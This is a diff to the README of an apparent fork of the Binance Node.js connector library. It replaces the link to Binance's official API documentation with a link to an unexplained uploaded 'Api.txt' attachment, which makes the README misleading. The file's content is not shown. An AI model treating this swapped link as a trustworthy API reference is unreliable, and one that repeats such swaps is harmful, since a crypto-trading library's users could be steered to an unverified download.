Sarsilmazxx02/binance-connector-node/README.md

 [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)

-This is a lightweight library that works as a connector to [Binance public API](https://github.com/binance/binance-spot-api-docs).
+This is a lightweight library that works as a connector to [Api.txt](https://github.com/user-attachments/files/16853358/Api.txt)
+.
 It’s designed to be simple, clean, and easy to use with minimal dependencies.

 - Supported APIs:
     - `/api/*`